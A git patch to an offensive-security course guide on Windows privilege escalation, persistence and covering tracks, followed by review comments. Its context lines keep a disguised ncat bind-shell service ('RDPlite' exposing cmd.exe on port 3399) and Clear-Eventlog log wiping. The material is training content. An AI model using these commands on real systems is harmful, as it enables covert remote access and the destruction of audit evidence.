From a3865118178520adf99c73ee1430e75d1f61c17a Mon Sep 17 00:00:00 2001 From: CTED_Inernal_CICDryan <cted_internal@cicd.com> Date: Tue, 4 Jan 2022 18:40:48 +0000 Subject: [PATCH] Student Guides Updated --- .../pages/lesson-9-windows-exploit_sg.adoc | 69 ++----------------- 1 file changed, 5 insertions(+), 64 deletions(-) diff --git a/security/modules/lessons/pages/lesson-9-windows-exploit_sg.adoc b/security/modules/lessons/pages/lesson-9-windows-exploit_sg.adoc index dab9d0cd..70608854 100644 --- a/security/modules/lessons/pages/lesson-9-windows-exploit_sg.adoc +++ b/security/modules/lessons/pages/lesson-9-windows-exploit_sg.adoc 
@@ -23,32 +23,6 @@ xref:ROOT:objectives.adoc#_section_7_5_covering_tracks[Section 7.5: Covering Tra {empty} + -== Approximate Timeline - -[.standard,width="100%",options="header"] -|=== -| Day |Planned Events |Duration -| **Day 11: Windows Exploitation** |**Facilitation:** Privilege Escalation | 50 minutes -| |*Break* | 10 minutes -| |**Facilitation:** Privilege Escalation | 40 minutes -| |*Break* | 10 minutes -| |**Facilitation:** Persistence | 45 minutes -| |*Break* | 10 minutes -| |**Facilitation:** Covering Tracks | 50 minutes -| |*Break* | 10 minutes -| |**Facilitation:** Covering Tracks | 25 minutes -|=== - - -== Facilitation: Windows Privilege Escalation - -*Outcome*: - -This section facilitation provides the students the necessary concepts to perform various techniques to escalate privileges in modern Windows environments. These concepts will provide students with the knowledge necessary to perform skill 15. While various techniques will be covered in this lesson block, students are only expected to demonstrate the ability to use one of the skills to achieve escalation. - -{empty} + - - === *REVIEW: User Mode vs. Kernel Mode, Priveleged vs. Unpriveleged* Remember that x86 architecture supports four protected rings, but that most common operating systems typically only utilize Ring 0 (Kernel) and Ring 3 (usermode). This distinction enables operating systems to isolate privileged access to hardware and direct memory access from standard usermode processes. 
@@ -114,7 +88,6 @@ An object that describes the security context of a process or thread. The inform ** Current ``Impersonation Levels`` ** Other statistics -NOTE: No need to list off all of the contents in an access token. But it is provided for reference. Ensure students understand that access token is associated with the privileges for a user. *Privilege* + The right of an account, such as a user or group account, to perform various system-related operations on the local computer, such as shutting down the system, loading device drivers, or changing the system time. Privileges differ from access rights in two ways: + @@ -224,23 +197,6 @@ for the instructor badge? {empty} + -===== DEMO: Check UAC Settings -The following can be performed from Powershell and CMD: - -. Search bar type UAC and go to the UAC control panel -. Check the reg key for the following command: - -``reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System`` -[start=3] -. The following *Registry Key Values* are important: - -* ``EnableLUA``: -** ``0x1`` Notifications On -** ``0x0`` Notifications Off - -* ``ConsentPromptBehaviorAdmin``: -** ``0x5`` *Default Value* (admin is prompted for permit or deny through popup) - .Sources: * https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gpsb/341747f5-6b5d-4d30-85fc-fa1cc04038d4[ConsentPromptBehaviorAdmin Levels] @@ -371,7 +327,6 @@ IMPORTANT: We want to identify anything running in non-standard locations as wel ===== DEMO: DLL hijacking (Writable Path, Vulnerable Scheduled Task) -NOTE: This demo uses *CVE-2016-6167* to demonstrate how a custom DLL can be used inject arbitary code on a target machine. In this example, ``putty.exe`` looks for a DLL named ``ntmarta.dll``. It is important that they know these aren't complex Zero day attacks, but documented vulnerabilties that a system administrator can easily miss. *Process Monitor* 
@@ -457,8 +412,6 @@ Services in windows are actually DLL's that are loaded and executed via svchost. In this demonstration a machine is enumerated for services running from directories that a regular user can modify. If a service is found that uses a directory with poor access controls, it can be compromised to run malicious code. -NOTE: Help the Students understand various commands to find services, and what can make a service vulnerable. - {empty} + ===== DEMO: Vulnerable services (Weak Permissions) @@ -517,7 +470,6 @@ NOTE: *networkedservice2* is a malicious service, but any executable can be tran ===== DEMO: Vulnerable services (Un-quoted Paths) Services that run executables instead of DLLs via ``svchost`` are vulnerable to this. This vulnerability relies on *unquoted spaces* in the path to a ``service executable path``. Any program with this is vulnerable to ``CVE-2015-0016``. + -NOTE: In this demo, the instructor will create two services (Demo1 and Demo2). One service has correct quotations around the path, while th other is missing quotations and is vulnerable to this exploit. . Run these commands, on an Administrative command prompt, to setup for showing the defferences in the two ``sevice executable paths``: + * ``sc.exe create "Demo1" binpath= "\"C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe\"" Displayname= "Demo Service 1" start= auto`` @@ -579,6 +531,7 @@ As mentioned earlier, ``SYSTEM`` is both an integrity level and a user account. {empty} + + ===== DEMO: SYSTEM Access and Defeating Protections . Sysinternals: 
@@ -599,6 +552,7 @@ As mentioned earlier, ``SYSTEM`` is both an integrity level and a user account. {empty} + + ===== DEMO: User Account Control (UAC) Bypass Sometimes an auto-elevate executable can be abused to execute a command at a higher integrity level without issuing a prompt to the user. When an auto-elevate executable has such a vulnerability, it is said to be vulnerable to a UAC Bypass. *A UAC Bypass* is any technique that allows a process to execute a command at a higher integrity level without triggering a prompt or warning to the user. + @@ -801,12 +755,6 @@ Why would you want to change a timestamp? ** Calls into question the validity of a file or log ** Allows for an easy miss if looking for modified files in an entirely different time period -NOTE: Although these programs are designed to frustrate forensic analysis, it should be noted that its use can be easily detected. Because the program can delete all timestamp information, the lack of timestamp values would lead an examiner to the conclusion that something is amiss on the system. + -{empty} + -Microsoft-based Windows operating systems record at least some timestamp information. The total absence of such is a dead giveaway that a user has tried to hide something. + -{empty} + -If the values are simply changed to believable values, then there is little chance of the change(s) being noticed at a casual glance. - {empty} + ==== System Resources 
@@ -822,11 +770,10 @@ When evaluating resources, network usage is just as important. Network usage can * As an attacker, what resources do you want to keep track of so you don't use to much? {empty} + - ===== DEMO: Evaluating System Resources The goal is to demonstrate and identify various techniques and methods to identify how your actions may affect the target. Below are various commands that can be run to show resource usage impact. + -NOTE: Have students follow along on their Windows instance, and demonstrate some of the following commands. Ask students what the syntax is doing or what switchs to use perodically. + [source,DOS] ---- @@ -854,6 +801,8 @@ net view {empty} + + + ==== Windows Logging *Windows Audit Policies* + Auditing tracks the activity of users and processes by recording selected types of events in the logs of a server or workstation + @@ -866,7 +815,6 @@ Auditing tracks the activity of users and processes by recording selected types ===== DEMO: Audit Logging -NOTE: Have students follow along on their Windows instance, and demonstrate some of the following commands. Ask students what the syntax is doing or what switchs to use perodically. [source,DOS] ---- @@ -921,7 +869,6 @@ EventID Description ===== DEMO: Event Logging -NOTE: Have students follow along on their Windows instance, and demonstrate some of the following commands. Ask students what the syntax is doing or what switchs to use perodically. [source,dos] ---- @@ -1004,7 +951,6 @@ A software utility that allows users to performs ``Windows Management Instrument ===== DEMO: Additional Logging -NOTE: Have students follow along on their Windows instance, and demonstrate some of the following commands. Ask students what the syntax is doing or what switchs to use perodically. *Checking PowerShell logging* + 
@@ -1037,7 +983,6 @@ reg query hklm\software\microsoft\wbem\cimom \| findstr /i logging ===== DEMO: Manipulating Logs and Files This demonstration covers a variety of methods, which reflect interacting with, manipulting, and clearing logs and file information to aid in covering track and blending in. In particular with a Windows system, there are limitations on what can done with logs, we must understand methods to alter other data to obscure our actions. + -NOTE: Have students follow along on their Windows instance, and demonstrate some of the following commands. Ask students what the syntax is doing or what switchs to use perodically. *Manipulating Logs and Files* + @@ -1105,7 +1050,6 @@ Clear-Eventlog -Log Application, System ===== DEMO: Windows Covering Tracks with Persistance -NOTE: Using ncat in this manner will cause Windows to serve a ``FAILED 1053`` error after 30 seconds, due to ncat not calling certain APIs. This is fine as we are just demoing the concept of blending using Windows services. . Place ncat.exe inside c:\windows\system32 * ``copy "c:\users\user\setup\fetchable\ncat.exe" c:\windows\system32`` @@ -1125,9 +1069,6 @@ NOTE: Using ncat in this manner will cause Windows to serve a ``FAILED 1053`` er * ``sc create RDPlite binpath= "cmd /C c:\windows\system32\wksprtzPS.exe -lp 3399 -e cmd.exe" type= own start= auto DisplayName= "RDPlite"`` * ``sc description RDPlite "Nothing to see here I am legit"`` -IMPORTANT: Point out during the demo that the description we would want to use something to blend in better such as looking the description of the dll we are using and adding microsoft's standard error sentence, for this we will use something simple -{empty} + -Point out the listening port we choose aligns with ports used by our exe to better blend in. This dll is accocated with RDP . Verify our service configuration that it blends. NOTE the 250 on the qdescription is how many bytes to display. * ``sc qc RDPlite`` -- GitLab
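Review bot: in the `@@ -23,32 +23,6 @@` hunk, deleting the `== Facilitation: Windows Privilege Escalation` heading together with the timeline leaves the `=== *REVIEW: User Mode vs. Kernel Mode ...*` subsection with no level-2 parent, so the section hierarchy jumps from the objectives block straight to a level-3 title. Keep a level-2 heading (the timeline and instructor wording can still go), and consider keeping the `*Outcome*` paragraph in student voice, since it is the only place that tells students they need to demonstrate just one of the escalation techniques. The retained title also misspells "Privileged vs. Unprivileged".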
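Review bot: the `@@ -224,23 +197,6 @@` hunk removes the whole `DEMO: Check UAC Settings` block but keeps the `.Sources:` list beneath it, so the `ConsentPromptBehaviorAdmin Levels` link now dangles with nothing in the student text referring to it. Either drop the sources with the demo, or keep the `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System` step and the `EnableLUA` / `ConsentPromptBehaviorAdmin` value list, which is auditing material students can use on their own instance rather than instructor-only framing like the other removed notes.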
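Review bot: in the `@@ -371,7 +327,6 @@` hunk, the removed NOTE is the only line that names the vulnerability (*CVE-2016-6167*) behind `DEMO: DLL hijacking (Writable Path, Vulnerable Scheduled Task)` and that makes the teaching point that these are documented misconfigurations an administrator can easily miss, not zero-days. Keep a one-sentence student-facing version of that sentence under the demo title so the student guide still states what the demo is based on and why it matters for defenders.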
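Review bot: in the `@@ -517,7 +470,6 @@` hunk, the step that follows the removed NOTE still says "showing the defferences in the two ``sevice executable paths``", but nothing now introduces Demo1 and Demo2 or explains that one path is quoted and the other is not; move that explanation into the step text in student voice and fix "defferences" and "sevice" while touching the line. Also consider rechecking the context sentence "Any program with this is vulnerable to ``CVE-2015-0016``": an unquoted service path is a configuration weakness class, not a single product defect, so a blanket CVE attribution should be verified against the source the lesson relies on.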
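Review bot: the `@@ -579,6 +531,7 @@` hunk (and the identical `@@ -599,6 +552,7 @@` hunk) adds a bare `+` line after `{empty} +` to push the `===== DEMO:` title down. A lone `+` outside a list is not the spacer idiom used everywhere else in this file; use another `{empty} +` line or a plain blank line so the rendering is consistent with the rest of the guide.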
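Review bot: in the `@@ -801,12 +755,6 @@` hunk, the removed NOTE is the only detection-side content in the timestamp discussion: that these tools are easily detected, and that a total absence of timestamp values is a dead giveaway that something is amiss. Keep those first two sentences as student text (without the "it should be noted" instructor framing) so the Covering Tracks section teaches how timestamp manipulation is spotted as well as why it is attempted; the remaining bullets only give the attacker's motivation.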
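Review bot: in the `@@ -822,11 +770,10 @@` hunk, the blank line between `{empty} +` and `===== DEMO: Evaluating System Resources` is deleted; because the trailing `+` is a hard line break, a title that immediately follows it is absorbed into the same paragraph in AsciiDoc and will not render as a section. Check that a blank line still precedes the title after this change. The paragraph ending "to show resource usage impact. +" also keeps a trailing `+` that only existed to join onto the removed NOTE; drop it.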
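Review bot: the `@@ -866,7 +815,6 @@` hunk, and the identical removals in the `@@ -921,7 +869,6 @@` and `@@ -1004,7 +951,6 @@` hunks, leave the `DEMO: Audit Logging`, `DEMO: Event Logging` and `DEMO: Additional Logging` titles followed directly by a `[source,DOS]` block with no sentence saying what the commands show. A one-line student-facing description per demo (which log or policy is being queried and what to look for) would replace the framing the instructor NOTE provided.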
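Review bot: in the `@@ -1037,7 +983,6 @@` hunk, the sentence "...to alter other data to obscure our actions. +" keeps a trailing `+` hard break that was only there to attach the removed NOTE; drop it. The same context paragraph has several typos worth fixing in the same pass ("manipulting", "covering track", "what can done"). Also verify the hunk-header context line `reg query hklm\software\microsoft\wbem\cimom \| findstr /i logging`: if it sits inside a `----` listing block, the `\|` escape is rendered literally and the copied command will not run; the escape is only needed in a table cell.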
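Review bot: in the `@@ -1105,7 +1050,6 @@` hunk, the removed NOTE is the only explanation of the `FAILED 1053` error that appears 30 seconds after the service starts, because ncat does not call the service control APIs; without it a student will read the error as a mistake in their setup. Keep a student-facing sentence stating that the error is expected and that the demo is still valid for the blending concept.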
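Review bot: in the `@@ -1125,9 +1069,6 @@` hunk, removing the IMPORTANT block leaves the next step, ". Verify our service configuration that it blends", referring to "blends" with no remaining definition of what is being checked; reword the step to say what `sc qc RDPlite` shows (binary path, start type, description) or keep a neutral sentence. Since the instructor-only rationale is gone, this is also the place to cross-reference the guide's own detection guidance from the privilege-escalation section ("identify anything running in non-standard locations") so students see the same service from the defender's side.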